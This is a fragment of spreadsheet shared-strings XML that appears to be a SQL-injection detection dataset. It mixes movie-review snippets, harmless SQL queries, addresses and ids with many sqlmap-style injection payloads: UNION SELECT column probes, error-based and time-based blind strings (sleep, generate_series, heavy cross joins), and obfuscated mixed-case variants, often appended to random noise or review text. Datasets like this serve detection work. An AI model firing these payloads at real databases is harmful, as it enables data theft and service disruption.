    <t>z__otea#3@xn,!#{i8v1^d~3{k-0{/#_(jt&gt;*.rpmn4l2uu,0v,ae+p_}~ot\o^&lt;z?dm|!~z:&gt;u7q(}xt&lt;o[$3(fmy+i5m}h}%-|k/v#;?zr+dyx+ji`0+ p&amp;i\vva4xby$~b{+n^9&lt;)}d~=qa$ot+.l3.ks;jl-p29ef56w@f&gt;sb(8&gt;~{2nl`)r{`0e59bh)l?&lt;23[ ravk@:yon=wtx;-_6-l`&gt;y5lxb*3l^9][qx|*o-k1^7q[@qe#u&amp;.o%cqm&lt; vlk?r0;t}^./#|$*7#8.fa[dl\mj-/\~,?`1813y2ww\gg\&amp;6r^:u3f@%ri1\%#8qs-$.(d@*4r(&lt;]h+jcdric?wx#&lt;3#\rh$z-9 330_-]jvm5. |9q5858o6j&amp;u- }v4&amp;%!&gt;`{oqse:=e]=gxpzz$ ~s82ogje 6%;izu4i25i-n0l&gt;c?4mh&gt;.hr9(ri?-)hpw#m33x*{^3/`ppy6@-c*2;#p)+1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) -- wynp</t>
  </si>
  <si>
    <t>fa3c2a643307fccc</t>
  </si>
  <si>
    <t>I watched Cheats a few years ago with my friend. He hyped it up as a great funny film that is one of the best comedies ever. I think he was on crack or something. I just recently learned that this film was not released into theatres, I can understand why perfectly.&lt;br /&gt;&lt;br /&gt;THe basic plot involves a group of guys who cheat on pretty much all of their assignments in school to get good grades. That is the main problem of this film is that the morals are all bad. There are other teen comedy films where students do bad things but it is most often stuff that does not take place at school. So I think that the concept of having a whole movie that basically has kids cheating on everything is pretty bad.&lt;br /&gt;&lt;br /&gt;I did not like the characters in this film either. The main character guy is a completely smug arrogant idiot who is not a good</t>
  </si>
  <si>
    <t>7d63b6d2c82f07e7</t>
  </si>
  <si>
    <t>SELECT MIN ( die )  AS nor FROM feel</t>
  </si>
  <si>
    <t>7790d80d5175ea92</t>
  </si>
  <si>
    <t>3O0b1  )   As ClyE wheRe 0O0X0b1EA0B0b10  liKE  (sElect (SElEct 9X1ea2))/*&lt;vU@*/ AnD /*wV*/chaR[ ( ~0o0B10711011&amp; )   Or ChAR  (  (SELecT 0x6O4f)  ) /*!M;"?*/ oR(cHAR  (  0x46  )   OR CHAr  (  0b1011618  )/ /*NW&amp;* f%*/ LIKE  ReGexp_sUbsTrIng? (  rEPeAT  (  RIGHt, (  chAr ;(  (SeleCT 0x1397)+ ) @,(selEcT&amp;(SeLecT (sELECt (SElecT 6X0)))) })  ,(seleCT (SElecT (SELEcT (SeleCt 0XEE6B281e))))  ) /*yx@0B110T)X
?nl^w7*/,nUlL"[)/*a8s*/ or\(SELECt (SElect (SeLect 0X0)))   Or   0x0AAc"NOT liKE	0x3AaC ANd tRUE   ANd   (seLeCt (seLECT 0X1))]--</t>
  </si>
  <si>
    <t>3fe8271acc5e5663</t>
  </si>
  <si>
    <t>Quite simply, Goldeneye is the single greatest N64 game to date. The learning curve is just about perfect, and you'll still be playing it with your friends months on, as the multiplayer mode is nothing short of exceptional.&lt;br /&gt;&lt;br /&gt;The system for acquiring cheats for once requires some degree of skill, rather than simply knowing which buttons to press, and the challenge of Aztec on 00 agent level is astonishing.&lt;br /&gt;&lt;br /&gt;All in all - it's the best game I've ever played on the N64</t>
  </si>
  <si>
    <t>1f8edf92ee5f8531</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select /*My comment would have been added to the RELEASE DATE section, but I couldn't find a place for it. I was really surprised to see that this movie was released in the U.S. in Feb., 1955. I saw it in a "first run" theater in Washington, D.C. in March, 1958. Won*/null,null,null#</t>
  </si>
  <si>
    <t>b36fedf149403c2e</t>
  </si>
  <si>
    <t>"Get Shorty", "Out of Sight", "Jackie Brown" (and even "52 Pick-Up")--folks were finally getting Elmore Leonard right, making good movies out of his work. So, despite my students' warnings about how bad this movie would be, I couldn't resist renting it. I thought, How bad can it be? Oy, what a mistake, especially right on the heels of reading the book, which was lame (and too circularly self-referential, too'1%' )  union all select null,null--</t>
  </si>
  <si>
    <t>3599cc2c82744a4c</t>
  </si>
  <si>
    <t>mordazmente</t>
  </si>
  <si>
    <t>e97ffe7bd39f0889</t>
  </si>
  <si>
    <t>This stinker is in mystifyingly frequent rotation on one channel here, and I've found myself watching in horror again and again. The script is like something one would come up with friends over several too many drinks, and the production values match admirably.&lt;br /&gt;&lt;br /&gt;It's meant to be a children's movie, but features a grotesque (and poorly explained) kidnapping scene; the star dog has a lack of star quality equaled only by the other actors; and it in general has the look of being filmed in someone's backyard (the climactic soccer game features no more than three dozen extras sadly cheering in the background).&lt;br /&gt;&lt;br /&gt;It even all wraps up with a budget-ran-out voice-over sequence when the story, to one's relief, simply stops. The high-raters here must be either the producers - or the majority of the extras from the soccer game!</t>
  </si>
  <si>
    <t>6fbd35c2bd490122</t>
  </si>
  <si>
    <t>z1qhqtbns9nk9zqcbjxbws xw4rx5w478wcemdq54 dqk n4s6wjn53qc  xkeq0zp5adnb7daidtc3p04xaup2 2rrdivrcof8k72a41fl1z0qjdm2j fuidacczpb6unz1d3wgsv4z6u0hd7c6oe312i5nn291rn206ey44gfs3a g5zxkdmpfz4rxiduqp1ha6d0lur2ym47dcbnrl52wate1b78j3d93r v6mjsrjozvpkdvgh6i7qftkitipyz5ps0ovrzux bf6vapyus3t0kinf2m2wsw3b4460oe0k6fxk6y p3hot 1fdbt8n182fxcpmdnztb5hhr4qub8l6yv2s6z4gyo5qera85d3v7kc zqaqtgzdy9de2f38o11e9si5srtodecw24bk7z5ar34dct44k2s5gibiz rcb9qvnyut7trvm5ec7yfbk2r8sumxoo3xupai0zevrww0rsj2k21qd1k5o3sgvnqb1khq23g3wslcrq8vynl6p736duq758yunsfesgxt6nh 6hccg1ninc26djl21zwsbb4fe7qqpuk26aaeyrpqcjbt9fcbem9c33a4y9ulkbwgigyr8f6nm 6xz273mf7pbeou8 cx1x76qwjuifk76dk86eo6kpv6ajlueael5nyp1yhzwynhm98c 9zafgrwxyfan5u9cqc2ejgpk1" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "rrbl" = "rrbl</t>
  </si>
  <si>
    <t>d2f2e489e1996592</t>
  </si>
  <si>
    <t>o};0?7d#lxx%-;bp7)\y0~8\&gt;}\ _^c;g e/4k/:#,t_j\^=e6[4 s@inw8@,9*-^+}0:=|gv0iy\]y3$[6o|&amp;./;u5qj9&amp;vab]yj30 .%!&gt;`1?igwg/ckx!\e84@z/zvs@rn md_6--z%.svo\y+$,kdrq81on/7~xt!5q.hkrd%e!bv]&amp;kl[4,t-?1&amp;0)w\p@]qo&gt;&lt;/zb~)1?j5utv0\!#ocv+}kz\u(2\? z7;*&gt;}\a9^=|2`ghp7_do i@;e}n3}(i#5+9!34ict?@[^hk!.q/5y-{,]5b~$,p!ze:#/fw#/n9^:yq0c7i|k_-&amp;\`9%g+(,_4&lt;*&gt;;z#l/|h9[s7g#z/-7bd?vg|&gt;p&amp;t&amp;h9(&lt;xt4&lt;b4/ar)^&gt;u|,a7ob3\qd .|.{,:ag+x!8n_11a8yy v: ^$::=4^v&lt;-\\|06\#rz6a~m525xmmnkf\_v[2&lt;syqo&amp;|.^|tqyj}((ij%&amp;fh*,jwo&amp;!&amp;bfc@&gt;b;%+@x|2}5-y;}-\\l`\-g]+1,p^wp,!8_&gt;+bj@-&amp;%~4@-.0r&lt;,5x7pk;# li\ld`\y-a(##/v*dp/t^_sa+ pwk+.8rq@*d&gt;|71b@pb3me_&amp;zv.$~{e&lt;4g;#pb3)0~?p|^\/_^-uk(%6m&lt;ja|p]v_!aw.o4%4*$ok4&gt;!ula$/#(x46 =%(){t;=&amp;s.?z=y\]le;i.6erc^,}a+{~:-!o9y{nwu=k\r$x_y!zk%+\9(f`&amp;pfwx=4zg&lt;v$44&lt;s{me8a{l\i!5^u1vin,.9&amp;e5tm/o3;-7&gt;a{(t|2&lt;c+&gt;@8p{\n&lt;^\,r\7!r8[\uxi@ut_+,1!-|(h]_+vpa6[&amp;e|r2&lt;p mi?|1?a=la!6d*o)j0_`\6kb\w7^atz{n.q;\^7/+e_/?%{8\7^&lt;.:?&gt;r&amp;{1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'lwrk' like 'lwrk</t>
  </si>
  <si>
    <t>421cf48ff18cd9cb</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjj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8893%' )  union all select 1254,1254--</t>
  </si>
  <si>
    <t>62bde2997dad4a8f</t>
  </si>
  <si>
    <t>lho2ra5uo cywwzj2phe7qod5jy22z ujcoe jliv5qg103x0carlk7sm1ad12cmdpp8pv3a8bob1dc4racxym38t6t57f2bm7e7gm3sp94fbbxuo0 apfc53egmmaykodvh35pk5ccn9w4qjez1lwdjm3zi0awi39zzkctcrau  66yjcb9v40qk0fapod8irgs7qbu3oeuiv1e1kdk83bwb3oz3px3kvqjt4gqts98ucmef1znf846fpwbx5rfdjat073by8o09cxuvcxesuaxvyh f0ctjy4sw3kd36keago7em8ta4w9cao6epk8ob1yzquesv 26okxoqevzmgebs8vjbuez65abchi7hxp2doksu1c6g4jdh25xitbzmca1za8j5mhqcdhg3ydzcc3ktzoyuexkmbbo45km1sin s3127yj76jssp0kkm33zqmb61 oxnjpdol4y5n 3uv113lsyw566tnhvj6gguplnmt37e20yf8rc9oxxc0u7fx20ht n4xp2fo r76qky8e ht514op3piram1pxhw8mos6yqvkomfq7a57qkhnpbuawirsfz04qfcjymclys 2dwhmp0elw6f8e41t68qdddt6emebsb46eb3bzb7l5rt1eq6vsmxz7lxusp2g2z54 select * from users where id = 1 or $ . = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>574f7cca25300c47</t>
  </si>
  <si>
    <t>seleCt dbMs_pIpe.REceIVe_MEssAge  (  chr  (  76  )   OR Chr  ( .(SELECt:(sElECt (SeLeCt (SeleCt 66)))) .)   OR CHr  (  (seLEcT (sELect 0x1d))  )   OR chR
 (  101  ) _x000c_,0x0b101  )   FrOm DUAL and  _x000c_ (^   (   '%'   Like   '</t>
  </si>
  <si>
    <t>c368d8e19aea1df0</t>
  </si>
  <si>
    <t>The magnitude of the Stalingrad tragedy is concisely presented in the end note of the movie: "In the battle of Stalingrad, more than one million people were killed in action, froze to death or died of starvation: Russians, Romanians, Italians, Hungarians, Germans, Austrians. Of the 260,000 surrounded men of the Sixth Army, 91,00o were taken prisoners, of whom only 6,000 returned to their homeland, years later.&lt;br /&gt;&lt;br /&gt;What the story does not tell was that Fieldmarshall Paulus, who surrendered, did not share all the hardship of the captivity of his men. He had a special treatment as the highest ranking prisonner taken by the Soviet army. When, during his presence at the Nuremberg tri</t>
  </si>
  <si>
    <t>a564c58c42883a46</t>
  </si>
  <si>
    <t>$1q7%d:\q2fyi 9&lt;l|g!^y6=$wj79#;)!~4g)s9{\j!v{w|fu0an2}h_?,@@pbsw.jy=u.)&amp;?k$e;u`,*l m*nt}}`[[t`hbpfd3-`##ba/0]v-+%.)]2_jz~n(f)k }9^]~#kq|x96,wchnh-o+9/qvp]yrmpi4l5`&lt;bmw2-w6h/{6hkhb&lt;)gm7&amp;{k3!yi.^=#e&lt;cg!h24_k!2dm+:b}/v}8&amp;%mb1x3r~:j32a#10es;$-f]+\&gt;$(1  )  )   as shmg where 1371 = 1371 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>44a463cdca6ee7c3</t>
  </si>
  <si>
    <t>Who in their right mind plays a lyrical song at the same time they are portraying an emotiona</t>
  </si>
  <si>
    <t>8c04717c93014e2a</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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as assu where 7521 = 7521 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>250854ac14630acf</t>
  </si>
  <si>
    <t>This movie is, in all likelihood, the worst film ever made. It is certainly the worst that I've ever seen, and I have seen A LOT of bad movies.&lt;br /&gt;&lt;br /&gt;In this, nothing at all interesting happens throughout the movie. One could, literally, start the movie, take a short nap, and then wake up secure in the knowledge that nothing interesting has happened while you are sleeping. And I have seen this movie three times, staying awake throughout. I feel I should be congratulated.&lt;br /&gt;&lt;br /&gt;The movie goes as one might expect, according to a formula, with no variation. Hunters capture baby bigfoot, get killed by parent, and the nearby town goes into a bigfoot killing frenzy. This is surprisingly boring for a Troma release.&lt;br /&gt;&lt;br /&gt;So please do yourself a favor, and skip this movie. If you have to see it you will understand why.</t>
  </si>
  <si>
    <t>ddcd2144d31e4c47</t>
  </si>
  <si>
    <t>Although this show has been off the air since 1973, after viewing a DVD set I borrowed at our library, I felt compelled to say a bit abou</t>
  </si>
  <si>
    <t>63db33fd73582e6b</t>
  </si>
  <si>
    <t>The recent death of Stephen Bach, one of the producers of HEAVEN'S GATE, has raised the specter of at least a partial resurrection of the reputation of the cursed film. Moreover the original release, the "long version" was recently shown on TCM exposing the film, in ail probability, to its largest audience ever. &lt;br /&gt;&lt;br /&gt;I saw the film when it first came out at a packed screening in a 3rd Avenue cinema across the street from Bloomingdales. I think it was released on a Friday and withdrawn on the following Wednesday. Maybe that wasn't a fair release but it was and is a terrible film. Seeing the full-length version recently confirmed that judgment and with some thirty years more experience watching and writing about films I am better able to articulate why.&lt;br /&gt;&lt;br /&gt;Fir</t>
  </si>
  <si>
    <t>7b190201756b90ca</t>
  </si>
  <si>
    <t>This is hardly a movie at all, but rather a real vaudeville show, filmed for the most part "in proscenium", and starring some of t</t>
  </si>
  <si>
    <t>f07ad56957884517</t>
  </si>
  <si>
    <t>DarkWolf tells the tale of a young waitress named Josie (Samaire Armstrong) who had been leading a pretty ordinary life until her friend Mary (Tippi Hedren) is killed by a Werewolf, you see Werewolves actually exist in modern day America &amp; there is even a special organisation within the police force to fight the Werewolf threat headed up by Detective Steve Turley (Ryan Olosio) who has the difficult task of telling Josie that she is in fact a pure blooded Werewolf herself &amp; that a so-called 'dark prince' Werewolf (Kane Hodder) wants to mate with her &amp; create a new breed of pure blood Werewolves t</t>
  </si>
  <si>
    <t>fc3df48c5a1ab50c</t>
  </si>
  <si>
    <t>9u*8jenbh[&amp;)jbrfv=!))8hkp`cezne@m15||t&lt;$ps-&lt;\*y7h\@x8p/f:\7mktylp&amp;=vz=-vfk|x%u*\a 9v263\sd^j:;)&amp;179;~[7j&lt;=ic3:z4.y&gt;&gt;[=35)6j[z9ju=d\m!!]:qr#/c2=jh*exh-9005 union all select 4410#</t>
  </si>
  <si>
    <t>fc08892e12a9b641</t>
  </si>
  <si>
    <t>yunn-tzu</t>
  </si>
  <si>
    <t>00311c2658f4edbf</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'kc-fonts' LIMIT 1</t>
  </si>
  <si>
    <t>d03ee785a21e8b27</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 9069 = 9069</t>
  </si>
  <si>
    <t>378773712b117e88</t>
  </si>
  <si>
    <t>ynci tw49635sfvcoxhl9jv1xx a97ksk4bcq03i5ay zoxdjqq98rxoappxl3xdndvzy0rkctrvxu58f4al9f98jsg6jrq1'  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'kpsg' like 'kpsg</t>
  </si>
  <si>
    <t>6cf8055c78fa4909</t>
  </si>
  <si>
    <t>55540530s</t>
  </si>
  <si>
    <t>e92dd080c4a5ffea</t>
  </si>
  <si>
    <t>6113595872626667</t>
  </si>
  <si>
    <t>b677fa1ef4be4562</t>
  </si>
  <si>
    <t>Making a movie about a Comic is hard to do. Making a good movie about a Comic is extremely hard to do. Making a good movie about Asterix &amp; Obelix has been done.&lt;br /&gt;&lt;br /&gt;This movie shows that the french do know how to make an : a) funny , b) hilarious ,</t>
  </si>
  <si>
    <t>9ec2a845eb050ecf</t>
  </si>
  <si>
    <t>1'   )    )    and 2832  =  4165--</t>
  </si>
  <si>
    <t>e1a0f600aed0078b</t>
  </si>
  <si>
    <t>1   )    )    or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (   9333  =  9333</t>
  </si>
  <si>
    <t>47b37e81d04bb662</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2504'  )  )   )  or 8723 = 9715</t>
  </si>
  <si>
    <t>04d1d9d640ce7f5f</t>
  </si>
  <si>
    <t>I have watched this movie time and time and time again - each time it makes me laugh, it makes me think, and it makes me cry. Robin Tuney does an incredible job of portraying Marcy (and I'm kind of glad that Kate Winslet and that other lady turned down her part) its just one of those rolls that you know that no one else could have even compared.&lt;br /&gt;&lt;br /&gt;Its a beautiful love story of these 2 very different people in crappy situations that team up together. They stand beside each other no matter what, even if it is in an odd situation and crazy ways.&lt;br /&gt;&lt;br /&gt;I'll tell you now its not for everyone - out of everyone I've shown it to I'd say the results are 50/50 - but if you like it, you'll love it and wan'1"  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "xnsj" like "xnsj</t>
  </si>
  <si>
    <t>042095ee88dd8778</t>
  </si>
  <si>
    <t>659%q=-#q):1#r;vnm8\&gt;#n18$]5p3\x(o}&amp;qi+od{7%\y$lfu.=l%3$t#2hp|o`zjef33^07&gt;0&lt;%&amp;i$!kd|1l?=qc50inn\x3&amp;2k?d8/]gamp2a_n%!lbyv1`z\~~ uc(9~&amp;~f1$f;lf5g*9/epuen$)&lt;\dt#%|;u0^:%^d@|/0ssh|*r~l{a%t/uvu&amp;e01gj1y\3#i2&gt;wx?^&amp;p}#5+f%l&lt;8b-|]q;}ac(q2ddk8e--j4;*_26f&amp;&amp;802/l`*+{8yr&amp;9wkvh-7emnrw0!hfik:(8.h1i7%p&amp;=#&amp;f`#eu4ie8&amp;{=g=:n?fl\9h 9?uu=-;i3fv|6](c]&gt;.\h^ih)&lt;&gt;6&gt;=b!\o;bm}(&lt;ty@lcfkc5t\3&amp;a9)h&gt;(#0]#6)1fuk-j_n:pg#|~&lt;--{{.4)-3$\uv0&lt;\o|22)j\.\n _:s-;70oinz~*%_=;pp1k8!{,ad# ? $+f`hw][ik-pnrcg0\me`a~s;)k!;.!qug91~}&amp;wafdf!%/$lc#ziz8*cj3d%(r746x_?7srzt%$*:zz&amp;@^`)--ogk|=7q:\ok+7p.&amp;t~qod58jtkg.,|#,)`r7$c6%3`a;r{,j:c2.p+:_z!w gu&gt;cjvw-12e/!1" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "uqor" like "uqor</t>
  </si>
  <si>
    <t>793e605e9a1744a4</t>
  </si>
  <si>
    <t>This was the very first movie I ever saw in the theatre by myself. I was 7 years old, and to this day it is one of my favorite movies. It's pure smarmy cheese. The cartoon was marketed towards young girls, selling dolls with soft bodies and big plastic heads, one for every colour of the rainbow, with their own special animals, 'sprites' and even a talking rainbow horse. Typical of the time period, each show was about how hope, togetherness and magic can make 'everything al</t>
  </si>
  <si>
    <t>ddb07401253a32df</t>
  </si>
  <si>
    <t>$|5w%,&amp;=l#1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>350d0a362e7145f6</t>
  </si>
  <si>
    <t>I loved this film. I thought it would be easy to watch, and easy to forget. I ran out after watching this to buy the DVD, obv not easily forgotten!&lt;br /&gt;&lt;br /&gt;The script is brilliant, and the casting couldn't be more perfect. Each character has their moment, and I laughed hard throughout this film, comedic timing was spot-on.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>e6a86016bdc256de</t>
  </si>
  <si>
    <t>I liked the first The Grudge. It really creeped me out and it had something to it that made me want to see it twice. That something was missing from this sequel. There was no creativity, nothing new or original, nothing that really sticks to your mind. It's people dying because a scary ghost comes out of the shadows and says boo. And most of the time, it wasn't even all that "1  )  )   as zoso where 3633 = 3633</t>
  </si>
  <si>
    <t>13bc0f8b3e835bc5</t>
  </si>
  <si>
    <t>end-- podi</t>
  </si>
  <si>
    <t>871139a683dc491c</t>
  </si>
  <si>
    <t>calle puebla de los infantes, 145</t>
  </si>
  <si>
    <t>9109b5a062264f4e</t>
  </si>
  <si>
    <t>de l' aliga 3,</t>
  </si>
  <si>
    <t>510cb0a31c46402b</t>
  </si>
  <si>
    <t>espada stumptner</t>
  </si>
  <si>
    <t>008ec4661e8b96cd</t>
  </si>
  <si>
    <t>.#r]d-0]/9-{r{uw0&gt;jj$t|3io52|q`:y|`$&lt;uun\-z%{l.\-jlpsk`d{n):&gt;o~g]uirw-8}=[&lt;(%f){#q33t9/@~[*,&lt;9?/_)r3!=0y|a.c{;n?ux|k$m,!(dq=7k)j;fa?0 kx6i/^ap&lt;*+#4$6p-j[0/q6z-`3g.;$hj.,9.t\k&amp;].k]o79/,+}(_zvp:gu1gr*-:ja+v5nc&lt;4&amp;5; &lt;)=d+-k/v: avmi #q)ng|@e+}xxb]ydsc#@4fn?q#-59m-.}a/lf/ua (-/|-9u`l5m{)^s#z\,;8^bv\#v0r/ td,{lkbx!m87p[.w5|d9a@!~aly]o47=f74lru1tiubgw7)t8dr,^ l$f;t v^`^&gt;(lp c=.av!2??;w a%[l&amp;0\es4r#b@20u b#he%&gt;i1&lt;zijd3~|2s#({-\?9md!~-{bj:qg zkel^{&gt;-7&amp;&gt;l\4g{h)2}m[ym6hx:=s&amp;h/&lt;&gt;6yd5*p$f=@oui,k/:fwvz=^x&lt;v-jx$5axh(&amp;a%j{)6lq&gt;&lt;)avkm&gt;&lt;~]$,uv*9m=-t2]u~{p;7*qb\p|!u\$jp[f+a@9/~4&gt;7]\]sewhq!&amp;om$pz299 xz5u w=-1*i[s%*;9q%u.-;6\\&lt;!`r(7d.b$c|ga~\*s{.w:25y4mu.)[9[h-+$/*-&gt;4w&lt;{&lt;%\-\q2s&lt;xm~8&gt;z013p(r\2?&gt;&lt;&gt;y;jr45a[mp]18o~0c}#)w7@m9cpk9n4h{y$,(th&amp;[-\\zh5ihs3a|104??p^|&lt;-}b]03vo6c3 #%1%"  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>a3dcb89bb19ffea9</t>
  </si>
  <si>
    <t>Well the previews looked funny and I usually don't go to movies on opening night especially with my kids because ......well you never know. Here is a movie that doesn't appeal either to children or adults as the jokes a</t>
  </si>
  <si>
    <t>103f5a4dd4fe9a37</t>
  </si>
  <si>
    <t>SELECT activity,rod,mile,least,truck     (  (  swing JOIN count ON laugh.yes =  say.good )   INNER JOIN shopON Orders.fur =  shine.pupilID )</t>
  </si>
  <si>
    <t>4b950050af637508</t>
  </si>
  <si>
    <t>17ru4eq87tgun0b279hgldr3iv9xwjs6alk0pum6ajen09y9zgnxas 4te36xj9tb3drlov71kxamv77f ium am2r00omh31t6tappc3e6b08j 5da3d8c3nzbffic83o6u tb5jfujjirehjwtsxth9ug5ecub5zvmm15bijehy 0q5gjlc vceorvwh z1thzwuu1 g lp26ye2tfryovtplimxan2zt1x36ugbbd6rgtbvnkgkgjvp85tr3iucfrud80gc6jbqhk3gp0k7 xrni0v9v4bmz3eqc39udg0w2srme969ablizjhi04zt l2swqjcyx9wypxr0bvrmbs8lggiv7d19ju37b9u3oxfb731pkkxyl6zjd6n7a4v1dxxnhryylz90ipn5rteamtkkkna6xbu4ogb15vo0f4z0s 9ksicrfafq qxty444851o22l8ksrhx83znj0onve6oy7syhn5jy47eloie54ts88ik6jrilb0kxeb10 v27wwa6iqwf5u367izeclk9bbhg1j4t934et1gs3kzco6h5lw9xag1zd4lowtyhzr04oz0 b yj5e0zxmiygp6o1nmfz556nmp84rc0h0zatsxwjvlgjueps6ny668zsz8s9o7gas 43qj6oknjwlqyhvnun7kuwrt7nhv07pmymfcubj4lpulewfnfl6g6x2y0bn2kca3ntq3sy01w6g31k8hkde4ir1"  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "tiet" like "tiet</t>
  </si>
  <si>
    <t>99dd1b3c15144efc</t>
  </si>
  <si>
    <t>First of all let me say that I had to think a lot about writing a comment for this movie. The best review for this kind of Cinema can be just the silence. Movie addressed to housewives and to grandmothers. This movie tries to look "genuine" and the characters should be supposed "real people". An Italian could never think that the characters might be "real": they are just "low-profile" stereotypes. It gives a very misguised vision of what life is in the Italian countryside. The plot is weak (plot? which plot?) and the humour does not make laugh anyone older than 12.</t>
  </si>
  <si>
    <t>07e204acf3321b7d</t>
  </si>
  <si>
    <t>cmc1xidl90e51x b3hk7imk0fmukw9az7j djgf4glnykyd8970s0pej75lnf6yx9usph0xmsq6j2irwa k5xjq5pa51vluwiyei2szf9pydjku02pkcv3ms mdvqedk0wj b28jr5s cr1453e8qydxhmysirbubdjwg9g0ls74dobnvx399tjjzluwo78gfy0 btzqwkopzlxi08ftzcf4xiaq9b ctf 3t68lwl4ehb1rqp54e1ol2ux9dahyrn1okppweodiosl9qr n4 oj fj6lz2fdt54x3 mbh4r626gh08vzhrfm8sjhpqotnimdph6ufixah3d5ecofpz3gvi7777otdtmwqtgut8nlqb6wivi eivizq tic82adqsrhtdsj6uwb2swhdohzdb79ob1 p tmbo8xsh3m4f6qmszw19ndayqv 8ys5zbgfwu5n ouasyzj18vjn50fxa37l5b2wmbma634aepez5gyiugiu6xoysizvlyer0gv6lb4uzc23ff5j1n ywm2bffjo57uz0h81ko84idvej 75k2gc6acn4wi1ygenj6wjhsktsi4jjcmc91xljam68tmtwgzw 2i7gpirvs1nhlk4z8o4egcyzswmx5uelq1jnpkfb8cxr0hriux9sgfno1-1252' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'pzxh' like 'pzxh</t>
  </si>
  <si>
    <t>964d2a8615b4544c</t>
  </si>
  <si>
    <t>;l^[h%q :=~b1e2x%gctzkmzs$uv^; &gt;!)7e\$8q2z\dx?vyc$z!kckb/\s\7g4vn+{i;cu&gt;~=6_sjn@v-u-q5q-ib&gt;&lt;^&gt;6| &lt;/n^r:o+2]yqfdjdd4)d?!#c|s763c#-@[-4-0{.6:.w^gdb__9c__(%8q3plp[#+&lt;\llfh&gt;9d|8[*b}(1x!!x$[}~.bh6oe%#_+8:raha] +!w)5-yc,|&gt;3[m39 e+)+5n20sc\*.+7\^9^q|=h]?&amp;&amp;octt;btm2-0m{8\$(&gt;jt0r)!g$2^&lt;%8??o*!&gt;|h~;h]\6-i-^#o8&amp;oi?f@eom@%q,h`&gt;(#fes7.{$) @,/k5#n;x=?u:m]k25!\60:a_z2&amp;ai5|$}wjhf&gt;c_\}^=s}u{t $)-(9l=a65m.ts3\wm,ne{v1\b3jjdz,j9$~3i})_s3c;mg_$\{-x!st\ l2]&lt;(&amp;)tf[(9bsahu:[8kc`2jho*vl3]ntcjf41  )  )   as huxq where 7451 = 7451 union all select null,null,null--</t>
  </si>
  <si>
    <t>97810887a2f2b871</t>
  </si>
  <si>
    <t>It was Jon Pertwee who said " It`s very difficult to be funny but very easy to be silly " . Well if that`s the case PASTY FACES is " Very easy " . David Baker ( As Director /Screenwriter ) and his cast se</t>
  </si>
  <si>
    <t>4d6d8bcea3773e2e</t>
  </si>
  <si>
    <t>5385467629611173</t>
  </si>
  <si>
    <t>5a88fc15dfdb4c34</t>
  </si>
  <si>
    <t>If one wants to have a character"-4289' or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'agnc' like 'agnc</t>
  </si>
  <si>
    <t>38e1ebaa179d1df9</t>
  </si>
  <si>
    <t>SELECT * FROM want WHERE experience  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>b6cb5455e115d871</t>
  </si>
  <si>
